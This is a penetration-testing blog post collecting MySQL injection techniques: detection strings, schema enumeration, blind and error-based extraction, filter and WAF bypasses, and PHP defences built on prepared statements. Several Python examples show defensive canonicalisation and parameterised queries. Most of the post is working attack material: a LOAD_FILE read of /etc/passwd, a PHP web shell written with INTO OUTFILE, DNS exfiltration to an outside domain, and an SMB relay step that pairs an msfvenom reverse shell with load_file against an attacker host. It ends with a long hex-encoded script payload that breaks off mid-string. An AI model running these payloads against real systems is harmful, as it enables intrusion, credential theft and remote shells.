Category Archives: Penetration Testing

MySQL Injection: Attack and Defense

Author: rootclay

This post is a summary of MySQL injection. MySQL can be exploited in an extremely flexible number of ways; what follows collects the mainstream techniques. If you know other good ones, please share them, and if anything here is wrong, corrections from the experts are welcome :)


Functions and characters commonly used in injection

The following are frequently used when injecting:

  • Control statements (select, case, if(), …)
  • Comparison operations (=, like, mod(), …)
  • String-guessing operations (mid(), left(), rpad(), …)
  • String-generation operations (0x61, hex(), conv(); conv([10-36],10,36) can produce every character)

Testing for injection

The following statements can be used to test a possible injection point:

string | numeric | login
' | AND 1 | ' OR '1
'' | AND 0 | ' OR 1 -- -
" | AND true | " OR "" = "
"" | AND false | " OR 1 = 1 -- -
\ | 1*2 | '='
\ | 1*2 | 'LIKE'
 | | '=0--+

SELECT * FROM Users WHERE id = '1''';
SELECT 1 FROM Users WHERE 1 = '1'''''''''''''UNION SELECT '2';
SELECT * FROM Users WHERE id = 3-2;
SELECT * FROM Users WHERE username = 'admin' AND password = '' OR '' = '';

Comment characters

The following comment sequences can be used in MySQL:

Symbol | Meaning
# | Hash comment
/* | C-style comment
-- - | SQL comment
;%00 | Null byte
` | Backtick (only usable at the end of a statement)

Examples:

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

Version, hostname, user and database name

Version | Hostname | User | Database name
VERSION() | @@HOSTNAME | user() | database()
@@VERSION | | current_user() | SELECT schema_name FROM information_schema.schemata;
@@GLOBAL.VERSION | | system_user() | SELECT DISTINCT(db) FROM mysql.db;--
/*!<mysql version number>*/ (e.g. /*!50094eaea*/): returns TRUE when the number is lower than the server version | | session_user() |

SELECT * FROM Users WHERE id = '1' AND MID(VERSION(),1,1) = '5';
SELECT CONCAT_WS(0x3A, user, password) FROM mysql.user WHERE user = 'root'--

Tables and columns

Determining the number of columns

ORDER BY

ORDER BY can be used to determine how many columns a table has:

Statement | Result
1' ORDER BY 1--+ | True
1' ORDER BY 2--+ | True
1' ORDER BY 3--+ | True
1' ORDER BY 4--+ | False: the table has three columns
-1' UNION SELECT 1,2,3--+ | True

SELECT … INTO

For an explanation of SELECT … INTO see the article "SELECT … INTO explained".

Statement | Result
-1 UNION SELECT 1 INTO @,@,@ | The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @,@ | The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @ | No error, so there is exactly one column

When a LIMIT clause is present, the following can be used:

SELECT username FROM Users limit 1,{INJECTION POINT};

Statement | Meaning
1 INTO @,@,@ | The used SELECT statements have a different number of columns
1 INTO @,@ | No error, so there are exactly two columns

Determining the column count of a known table

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
SELECT passwd FROM Users WHERE id = {INJECTION POINT};

Statement | Meaning
1 AND (SELECT * FROM Users) = 1 | Operand should contain 3 column(s): the table has exactly 3 columns

Finding table names

Several ways to enumerate the tables of a database:

UNION query:
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables

Blind:
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

Error-based:
1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Finding column names

Several ways to enumerate the columns of a table:

UNION query:
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'
(the single quotes can be avoided by writing the table name in hex)

Blind:
AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

Error-based:
1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

PROCEDURE ANALYSE:
1 LIMIT 1,1 PROCEDURE ANALYSE()
(returns the name of the second column)

String concatenation

Each of the following statements concatenates strings:

SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

Conditionals & timing functions

Conditional statements | Timing functions
CASE | SLEEP(): introduced in MySQL 5
IF() | BENCHMARK(): available in MySQL 4 and 5
IFNULL() |
NULLIF() |

Examples:

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '
SELECT IF(1=1, sleep(5), false);
SELECT IF(1=1, true, false);
SELECT CASE WHEN 1=1 THEN true ELSE false END;

BENCHMARK() executes an expression the given number of times; with a large count it produces the same delay as sleep().

File operations

File operation privileges

MySQL has a global system variable called secure_file_priv. It restricts data import and export operations such as SELECT … INTO OUTFILE and LOAD_FILE().

  1. If secure_file_priv is empty, these functions can be used directly; if it is NULL, they cannot be used at all.
  2. Versions before MySQL 5.5.53 default to empty; later versions default to NULL, which disables the feature.

The privilege can also be checked with the following queries:

Statement | Needs root | Version
SELECT File_priv FROM mysql.user WHERE user = 'username'; | yes | MySQL 4/5
SELECT grantee, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'file' AND grantee like '%username%'; | no | MySQL 5

Reading files

Files are read with LOAD_FILE().

Examples:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE(0x2F6574632F706173737764);

Notes:
1. LOAD_FILE's default directory is @@datadir
2. The file must be readable by the current user
3. At most 1047552 bytes can be read; @@max_allowed_packet shows the limit

Writing files

INTO OUTFILE/DUMPFILE

The classic file-writing example:

To write a PHP shell:
SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

Both clauses write files, but they differ in an important way:
INTO OUTFILE appends a newline at the end of every row it writes.
INTO DUMPFILE writes the content exactly as it is, which makes it the right choice for binary files.
In a UDF privilege-escalation scenario, where a binary file has to be uploaded, OUTFILE will not work.

Many articles online describe this, for example this one.

Notes:
1. INTO OUTFILE does not overwrite an existing file
2. INTO OUTFILE must be the last clause of the query
3. The path cannot be encoded; it must be given as a single-quoted string

Out-of-band channels

Out-of-band injection was summarised by overseas researchers some time ago; I reproduced most of it and wrote it up on my blog, so only a brief mention here.

What is out-of-band injection?

Out-of-band attacks extract data from the server over a different protocol or channel: HTTP(S) requests, DNS resolution, SMB, mail services and so on.

Constraints

  • These functions obviously require absolute paths
  • If secure_file_priv is empty, the functions can be used directly; if it is NULL, they cannot
  • Versions before MySQL 5.5.53 default to empty; later versions default to NULL, which disables the feature

DNS injection

select load_file(concat('\\\\',version(),'.rootclay.club\\clay.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));

The result of the statements above can be observed with Wireshark: filter on the DNS protocol and the outgoing data is clearly visible, as in the figure below.

DNS injection needs a domain whose resolution you can observe; owning one is best, but otherwise the CEYE site lets you view the data.

SMB relay injection

What is SMB relay

A brief description of the SMB relay process.

Assume two hosts, A and B:
(1) A initiates a connection to B
(2) B sends A a challenge (8 bytes of random data)
(3) A encrypts the challenge with standard DES using a DESKEY derived from its plaintext password and sends the response to B
(4) B fetches A's LM hash and NTLM hash from the SAM, computes the DESKEY and DES-encrypts the challenge it sent to A
(5) If the result of (4) matches the response from A, A is granted access to B
Now assume an attacker C gets involved:
(1) C initiates a connection to B
(2) B sends C a challenge D (random data)
(3) C waits for A to initiate a connection to B
(4) When A connects to B, C impersonates B and sends challenge D to A
(5) A encrypts challenge D with standard DES using a DESKEY derived from its plaintext password, producing response E, and sends it to B
(6) C intercepts response E and forwards it to B as the response to challenge D from step (2), claiming to be A
(7) B fetches A's LM hash and NTLM hash from the SAM, computes the DESKEY and DES-encrypts challenge D
(8) If the result of (7) matches the response from C, C is granted access to B as A.

Attack flow

For stealing NTLM hashes and shells via SMB relay see the article SMB Relay Demystified and NTLMv2 Pwnage with Python.

The practical steps, tidied up:
1. First generate a reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=<attacker listening port> -f exe > reverseshell.exe
2. Run smbrelayx, pointing it at the target and the generated reverse shell, and wait for connections.
smbrelayx.py -h <target ip> -e <path to reverse shell>
3. Use the multi/handler module, listening on the attacker ip and port.
4. Run the following on the MySQL server and a shell is obtained. It amounts to the server accessing the attacker's SMB service, but in fact the MySQL server's identity is stolen.
select load_file('\\<attacker ip>\aa');

Bypass techniques

Bypassing single quotes

Statement | Explanation
SELECT * FROM Users WHERE username = 0x61646D696E | HEX encoding
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) | CHAR() function

Case variation bypass

?id=1+UnIoN+SeLecT+1,2,3--

Keyword-replacement bypass

?id=1+UNunionION+SEselectLECT+1,2,3--

Comment bypass

?id=1+un/**/ion+se/**/lect+1,2,3--

Special embedding bypass

?id=1/*!UnIoN*/SeLecT+1,2,3--

Wide-byte injection

Wide-byte injection most commonly uses the GBK encoding in China. It mainly defeats addslashes() and similar functions that escape special characters. The backslash (\) is 0x5c; when you send %bf%27, the function sees the single quote and inserts a backslash, giving %bf%5c%27, and in GBK the pair %bf%5c becomes the single wide character "縗". The %bf position can be any byte from %81 to %fe. Wide-byte injection is not limited to SQL injection; it applies in many other places as well.
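The following is an added example, not code from the original post, that reproduces the wide-byte problem just described in Python and shows the property a correct fix must have. escape_bytes_naive stands in for addslashes()-style byte escaping, escape_text escapes only after the input has been decoded in the connection charset, and the %bf%27 request bytes are the constructed sample input.

```python
import re


def escape_bytes_naive(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of addslashes(): put 0x5c in front of
    every quote and backslash without knowing the connection character set."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5c):      # ' " \
            out.append(0x5c)
        out.append(b)
    return bytes(out)


def escape_text(text: str) -> str:
    """Escaping applied after decoding in the connection charset: the backslash is
    inserted between characters, so it can never be absorbed into a multibyte one."""
    return (text.replace("\\", "\\\\")
                .replace("'", "\\'")
                .replace('"', '\\"'))


def has_unescaped_quote(fragment: str) -> bool:
    """True if a single quote is preceded by an even number of backslashes
    (zero included), i.e. it still terminates the SQL string literal."""
    return re.search(r"(?<!\\)(?:\\\\)*'", fragment) is not None


# Constructed sample: the %bf%27 request bytes described in the text
ATTACKER_BYTES = b"\xbf\x27"


def vulnerable_fragment() -> str:
    """What MySQL sees when the bytes are escaped first and decoded as GBK later:
    0xbf 0x5c merge into one wide character and the quote is left bare."""
    return escape_bytes_naive(ATTACKER_BYTES).decode("gbk")


def fixed_fragment() -> str:
    """Decode in the connection charset first (a lone 0xbf is not valid GBK and
    is replaced), then escape: the quote is now protected by a backslash."""
    return escape_text(ATTACKER_BYTES.decode("gbk", errors="replace"))


if __name__ == "__main__":
    print(repr(vulnerable_fragment()), has_unescaped_quote(vulnerable_fragment()))
    print(repr(fixed_fragment()), has_unescaped_quote(fixed_fragment()))
```

In PHP terms the equivalent is to stop using addslashes() and either use prepared statements or call mysqli_real_escape_string() only after mysqli_set_charset() has told the driver which character set the connection really uses.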

MySQL version-number comments

Examples:
UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+
SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);
  • Queries like these execute; I think of it as similar to a script's first-line shebang such as #!/bin/sh selecting the interpreter
  • A statement whose version number is less than or equal to the server version is executed
  • For example, with MySQL 5.7.17, /*!50717*/ and any lower number executes

Character-encoding bypass

A while ago I read a post on ph's blog about MySQL character encodings; the gist is as follows, the original is here.
When code like the following is present, the character set is set to utf-8, but not everything is utf-8, and the actual conversion produces unexpected results; see ph's article for the details.

$mysqli->query("set names utf8");

In an SQL query

the %e4 in test.php?username=admin%e4 is dropped after admin, which bypasses some logic; other bytes such as %c2 behave the same way.

Bypassing spaces

Special characters instead of spaces

Byte | Meaning
09 | Horizontal Tab
0A | New Line
0B | Vertical Tab
0C | New Page
0D | Carriage Return
A0 | Non-breaking Space
20 | Space

Example:

'%0AUNION%0CSELECT%A0NULL%20%23

Parentheses instead of spaces

Byte | Meaning
28 | (
29 | )

Example:

UNION(SELECT(column)FROM(table))

Inserting characters after and/or instead of spaces

Any mix of + - ~ ! can replace the space (test locally; the parity required may differ for different mixes).

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and-++-1=1;
(an even number of - is required)

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and!!~~~~!1=1;
(an odd number of ! is required)

In fact all of the following bytes can be tested:

Byte | Meaning
20 | Space
2B | +
2D | -
7E | ~
21 | !
40 | @

Comments & quotes

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and/**/1=1;
SELECT DISTINCT(db) FROM mysql.db WHERE `Host`='localhost' and"1=1";

Encoding bypass

Encoding | Example
URL encoding | SELECT %74able_%6eame FROM information_schema.tables;
Double URL encoding | SELECT %2574able_%256eame FROM information_schema.tables;
Unicode encoding | SELECT %u0074able_%u6eame FROM information_schema.tables;
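A defender-side counterpart to the space, comment, version-comment and encoding tricks listed in the sections above: a small canonicaliser that reduces a request parameter to the form MySQL's lexer would see before any keyword check runs. This is an added example, not code from the original post; the keyword list, the two-round decode limit and the sample inputs (taken from the payloads in this part of the post) are constructed for it.

```python
import re
from urllib.parse import unquote_plus

# Bytes MySQL accepts as token separators (the tables above): TAB LF VT FF CR NBSP SPACE
MYSQL_SPACE = "\x09\x0a\x0b\x0c\x0d\xa0\x20"
SPACE_RUN = re.compile("[" + MYSQL_SPACE + "]+")

# Illustrative keyword list, constructed for this example; a real rule set is larger
KEYWORDS = ("union", "select", "from", "information_schema",
            "load_file", "outfile", "sleep", "benchmark")


def percent_decode(value: str, rounds: int = 2) -> str:
    """Undo percent-encoding repeatedly so double-encoded input collapses,
    and also handle the non-standard %uXXXX form."""
    for _ in range(rounds):
        before = value
        value = unquote_plus(value, encoding="latin-1")   # '+' is a space in a query string
        value = re.sub(r"%u([0-9a-fA-F]{4})",
                       lambda m: chr(int(m.group(1), 16)), value)
        if value == before:
            break
    return value


def normalize(value: str, comment_as_space: bool) -> str:
    """Canonical form of one parameter value.

    /*!NNNNN body */ keeps its body, because MySQL executes it.  A plain
    /* ... */ is a token separator for MySQL, but a filter that merely deletes
    it sees the surrounding pieces joined, so the caller asks for either view."""
    s = percent_decode(value)
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " " if comment_as_space else "", s, flags=re.S)
    s = SPACE_RUN.sub(" ", s)
    return s.strip().lower()


def suspicious_keywords(value: str) -> list:
    """Keywords found in either canonical view, in KEYWORDS order."""
    views = (normalize(value, True), normalize(value, False))
    hits = []
    for kw in KEYWORDS:
        pattern = r"(?<![a-z0-9_])" + re.escape(kw) + r"(?![a-z0-9_])"
        if any(re.search(pattern, v) for v in views):
            hits.append(kw)
    return hits


if __name__ == "__main__":
    # Constructed samples: payloads shown in this section, plus a benign value
    for sample in ("'%0AUNION%0CSELECT%A0NULL%20%23",
                   "1+un/**/ion+se/**/lect+1,2,3--",
                   "1/*!UnIoN*/SeLecT+1,2,3--",
                   "SELECT+%2574able_%256eame+FROM+information_schema.tables",
                   "12999"):
        print(repr(sample), "->", suspicious_keywords(sample))
```

The point of producing two views is that a blocklist only has to be wrong about one lexer detail to be bypassed; canonicalising before matching removes whole classes of variants at once, which is why this kind of normalisation belongs in front of any signature check, and why parameterised queries rather than filters remain the actual fix.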

Keyword bypass

Test case: information_schema.tables

Technique | Example
Spaces | information_schema . tables
Backticks | `information_schema`.`tables`
Special symbols | /*!information_schema.tables*/
Aliases | information_schema.partitions, statistics, key_column_usage, table_constraints

Authentication bypass

Bypass string: '='

select data from users where name=''=''
select data from users where false=''
select data from users where 0=0

Bypass string: '-'

select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0

For example, when a login form needs email and passwd, you can enter

email=''&password=''

Type conversion

' or 1=true
' or 1
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

There is also a vulnerability related to this; take a CTF challenge as an example (source below):

<?php
class fiter{
    var $str;
    var $order;

function sql_clean($str){
    if(is_array($str)){
        echo "<script> alert('not array!!@_@');parent.location.href='index.php'; </script>";exit;
    }
    $filter = "/ |\*|#|,|union|like|regexp|for|and|or|file|--|\||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."/i";
    if(preg_match($filter,$str)){
        echo "<script> alert('illegal character!!@_@');parent.location.href='index.php'; </script>";exit;
    }else if(strrpos($str,urldecode("%00"))){
        echo "<script> alert('illegal character!!@_@');parent.location.href='index.php'; </script>";exit;
    }
    return $this->str=$str;
}

function ord_clean($ord){
    $filter = " |bash|perl|nc|java|php|>|>>|wget|ftp|python|sh";
    if (preg_match("/".$filter."/i",$ord) == 1){
        return $this->order = "";
    }
    return $this->order = $ord;
}

}

Many keywords are filtered here, so type conversion is needed; we use the + operator.

Payload:
uname=aa'+(ascii(mid((passwd)from(1)))>0)+'1
The SQL executed:
xxxxxx where username = 'aa'+(ascii(mid((passwd)from(users)))>0)+'1'
From here a script can be written to extract the data.

Besides +, the other arithmetic operators also trigger type conversion, e.g. MOD, DIV, *, /, %, -
For implicit type conversion see this article.

HTTP parameter pollution

When the request parameters are

http://sqlinjection.com/?par1=val1&par1=val2

different web servers may produce different results. Borrowing the summary from a foreign researcher's article:

Web Server | Parameter Interpretation | Example
ASP.NET/IIS | Concatenation by comma | par1=val1,val2
ASP/IIS | Concatenation by comma | par1=val1,val2
PHP/Apache | The last param is resulting | par1=val2
JSP/Tomcat | The first param is resulting | par1=val1
Perl/Apache | The first param is resulting | par1=val1
DBMan | Concatenation by two tildes | par1=val1~~val2

Different web servers handle these quite differently:

Query String | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP
?test[1=2 | test_1=2 | test[1=2
?test=% | test=% | test=
?test%00=1 | test=1 | test=1
?test=1%001 | NULL | test=1
?test+d=1+2 | test_d=1 2 | test d=1 2

Another foreign article on the subject is recommended here.
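The table above is a list of behaviours; the following added example (not code from the original post) makes each of them reproducible for a query string without its leading "?", and adds the defensive policy a gateway or application should apply: refuse any request whose parameter names repeat, so that a front-end filter and the back-end can never end up looking at different values. The policy names and the sample query string are constructed for the example.

```python
from urllib.parse import parse_qsl


def resolve_duplicates(query: str, policy: str) -> dict:
    """Collapse repeated parameter names the way one server family does (table above)."""
    merged = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in merged:
            merged[name] = value
        elif policy == "first":          # JSP/Tomcat, Perl/Apache
            continue
        elif policy == "last":           # PHP/Apache
            merged[name] = value
        elif policy == "comma":          # ASP.NET/IIS, ASP/IIS
            merged[name] += "," + value
        elif policy == "tildes":         # DBMan
            merged[name] += "~~" + value
        else:
            raise ValueError(f"unknown policy {policy!r}")
    return merged


def interpretations(query: str, name: str) -> dict:
    """How one parameter of the same request reads under every interpretation."""
    return {p: resolve_duplicates(query, p).get(name)
            for p in ("first", "last", "comma", "tildes")}


def repeated_names(query: str) -> list:
    """Parameter names that occur more than once, sorted."""
    names = [n for n, _ in parse_qsl(query, keep_blank_values=True)]
    return sorted({n for n in names if names.count(n) > 1})


def strict_params(query: str) -> dict:
    """Defensive parse: a request with repeated names is rejected outright instead
    of being silently resolved one way by the WAF and another way by the backend."""
    dupes = repeated_names(query)
    if dupes:
        raise ValueError(f"repeated parameters: {dupes}")
    return dict(parse_qsl(query, keep_blank_values=True))


if __name__ == "__main__":
    sample = "par1=val1&par1=val2"          # constructed request from the text
    print(interpretations(sample, "par1"))
    print(repeated_names(sample))
```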

Regex filter bypass in practice

Filtered: and, or
PHP regex: preg_match('/(and|or)/i', $id)
Original query: 1 or 1 = 1, 1 and 1 = 1
New query: 1 || 1 = 1, 1 && 1 = 1

Filtered: and, or, union
PHP regex: preg_match('/(and|or|union)/i', $id)
Original query: union select user, password from users
New query: 1 || (select user from users where user_id = 1) = 'admin'

Filtered: and, or, union, where
PHP regex: preg_match('/(and|or|union|where)/i', $id)
Original query: 1 || (select user from users where user_id = 1) = 'admin'
New query: 1 || (select user from users limit 1) = 'admin'

Filtered: and, or, union, where, limit
PHP regex: preg_match('/(and|or|union|where|limit)/i', $id)
Original query: 1 || (select user from users limit 1) = 'admin'
New query: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

Filtered: and, or, union, where, limit, group by
PHP regex: preg_match('/(and|or|union|where|limit|group by)/i', $id)
Original query: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
New query: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

Filtered: and, or, union, where, limit, group by, select
PHP regex: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Original query: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
New query: 1 || 1 = 1 into outfile 'result.txt'
           1 || substr(user,1,1) = 'a'

Filtered: and, or, union, where, limit, group by, select, '
PHP regex: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Original query: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
New query: 1 || user_id is not null
           1 || substr(user,1,1) = 0x61
           1 || substr(user,1,1) = unhex(61)

Filtered: and, or, union, where, limit, group by, select, ', hex
PHP regex: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
Original query: 1 || substr(user,1,1) = unhex(61)
New query: 1 || substr(user,1,1) = lower(conv(11,10,36))

Filtered: and, or, union, where, limit, group by, select, ', hex, substr
PHP regex: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Original query: 1 || substr(user,1,1) = lower(conv(11,10,36))
New query: 1 || lpad(user,7,1)

Filtered: and, or, union, where, limit, group by, select, ', hex, substr, white space
PHP regex: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
Original query: 1 || lpad(user,7,1)
New query: 1%0b||%0blpad(user,7,1)

Defenses (code examples in PHP)

For defenses such as a WAF there is little I can add beyond keeping them patched; here I focus on the code level.
The following ways of querying are recommended:

MYSQLi

$stmt = $db->prepare('update name set name = ? where id = ?');
$stmt->bind_param('si',$name,$id);
$stmt->execute();

ODBC

$stmt = odbc_prepare( $conn, 'SELECT * FROM users WHERE email = ?' );
$success = odbc_execute( $stmt, array($email) );

or

$dbh = odbc_exec($conn, 'SELECT * FROM users WHERE email = ?', array($email));
$sth = $dbh->prepare('SELECT * FROM users WHERE email = :email');
$sth->execute(array(':email' => $email));

PDO

$dbh = new PDO('mysql:dbname=testdb;host=127.0.0.1', $user, $password);
$stmt = $dbh->prepare('INSERT INTO REGISTRY (name, value) VALUES (:name, :value)');
$stmt->bindParam(':name', $name);
$stmt->bindParam(':value', $value);

// insert one row
$name = 'one';
$value = 1;
$stmt->execute();

or

$dbh = new PDO('mysql:dbname=testdb;host=127.0.0.1', $user, $password);
$stmt = $dbh->prepare('UPDATE people SET name = :new_name WHERE id = :id');
$stmt->execute( array('new_name' => $name, 'id' => $id) );

Frameworks

With a framework, just follow its API; for example, WordPress queries:

global $wpdb;
$wpdb->query(
    $wpdb->prepare( 'SELECT name FROM people WHERE id = %d OR email = %s',
        $person_id, $person_email
    )
);
or
global $wpdb;
$wpdb->insert( 'people',
        array(
            'person_id' => '123',
            'person_email' => 'bobby@tables.com'
        ),
    array( '%d', '%s' )
);
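To make the difference between the recommended prepared statements and string-built queries concrete, here is an added example that is not part of the original post: the login bypass from the top of the post (password ' OR ''=') run against a concatenated query and against a parameterised one. Python's sqlite3 module stands in for MySQL so the block runs offline; the users table and its single row are constructed sample data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the Users table with one constructed row.
    The password is stored in clear text only to keep the demonstration short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse-battery')")
    return conn


def login_concatenated(conn, username: str, password: str) -> bool:
    """Vulnerable form: user input becomes part of the statement text, so a
    password of  ' OR ''='  turns the WHERE clause into
    password = '' OR ''=''  (the login bypass shown at the top of the post)."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_prepared(conn, username: str, password: str) -> bool:
    """Fixed form: placeholders.  The values travel separately from the statement
    text and cannot change its structure (same idea as the mysqli/PDO code above)."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo() -> dict:
    """Run both forms with the real password and with the bypass string."""
    conn = make_db()
    bypass = "' OR ''='"
    return {
        "concat_real": login_concatenated(conn, "admin", "correct-horse-battery"),
        "concat_bypass": login_concatenated(conn, "admin", bypass),
        "prepared_real": login_prepared(conn, "admin", "correct-horse-battery"),
        "prepared_bypass": login_prepared(conn, "admin", bypass),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:16s} login accepted: {ok}")
```

Only concat_bypass differs between the two forms: with placeholders the quote inside the password is data, not syntax, so the statement the database parses is the one the developer wrote.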

References

This article is mainly a summary; some points may not be described in much detail, so feel free to dig deeper yourself.

From SQLiGOD to XSS

0x00 Preface
A month or two ago something called SQLiGOD appeared abroad. It looked pretty neat, so I studied it and then used it in one of the SCTF challenges.

0x01 SQLiGOD
SQLiGOD was written by MakMan, an overseas researcher, to assist MySQL injection; in essence it is a concat() expression.
It uses MySQL's union echo to construct HTML, which makes the injection process more convenient.
It has been out for a while; kuuki submitted it to drops but it was not accepted, so it went to zone, where there is a brief introduction.

Here is his payload

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b72
65703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d
